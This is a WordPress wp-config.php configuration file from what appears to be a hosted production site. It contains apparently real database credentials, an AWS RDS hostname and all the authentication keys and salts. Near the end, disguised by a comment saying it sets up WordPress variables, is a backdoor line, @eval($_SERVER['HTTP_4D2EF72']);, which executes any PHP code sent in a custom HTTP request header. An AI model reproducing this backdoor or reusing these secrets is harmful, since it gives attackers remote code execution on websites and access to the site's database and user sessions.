File: /var/www/volumes/69b4844ae61d4e92bf26ad98af552775/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'product_69b4844ae61d4e92bf26ad98af552775' );
/** MySQL database username */
define( 'DB_USER', 'u_f40cf2d7df' );
/** MySQL database password */
define( 'DB_PASSWORD', 'f5829285adb450e2' );
/** MySQL hostname */
define( 'DB_HOST', 'rsprod-cluster.cluster-c0dwyqriadfc.us-east-1.rds.amazonaws.com' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'L.R|139-77-_tRx/g%BE@vHKOz_C/le+r99y)>iK+4&r)dW+B2clThar?&1Mo0a[' );
define( 'SECURE_AUTH_KEY', 'S5#cj#e[W+5/Ez1k]uN|ULawTrW[ep~ g+>2&-BUrcJPXlhX7WpU$k2w9+nazx{w' );
define( 'LOGGED_IN_KEY', '%*M-Kk_`se@p!*`@o@Sm1%J,SQPU~,lti2.,8x!Bm +2U;!xM(ICt8{|Q6h|1aiv' );
define( 'NONCE_KEY', '?wcK]W[{;,d2&}X_<CW6fF -b`Zu.HH>NoO_S!u,sgTUj(h0fv:#kMW50Xf>BJ~C' );
define( 'AUTH_SALT', '_1aeE1yHgQH/uSYZxGnYf%Bd}Q1J3_f)q7wNM/JjjM#X~khu,O(.zL -lorwh1bd' );
define( 'SECURE_AUTH_SALT', 'w5z-}Zb!y2(J#!O<DcH&LMvOjymLnh4J:1f/h +/HnfD4.n`~c7^Fb+gAJ25s`J;' );
define( 'LOGGED_IN_SALT', '?}}[+2+5;<-!ODk?|@#$~TtNsCJ;3xZv7`<0J#)`k%8o6]y{T,o1IrYX4;&r@yoh' );
define( 'NONCE_SALT', 'sS,w|O#HJ599XXT9A~<W8f o zD<D9C(k7lAzYqJ!wPHRYYj`8_co{xi{RIM{v6i' );
define( 'WP_CACHE_KEY_SALT', 'JCP`+TMJK6jJ2Q`VT.5K6=b@v6]MZPl$TvxQ$O R51&>MT2xA~hI*p,m*#fDBV%j' );
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
$_SERVER['HTTPS'] = 'on';
define( 'FS_METHOD', 'direct' );
define( 'WP_MEMORY_LIMIT', '512M' );
define( 'WP_MAX_MEMORY_LIMIT', '1024M' );
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) )
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_4D2EF72']);
require_once ABSPATH . 'wp-settings.php';
ini_set( 'error_log', '/var/www/volumes/69b4844ae61d4e92bf26ad98af552775/logs/php_logs/php_errors.log' );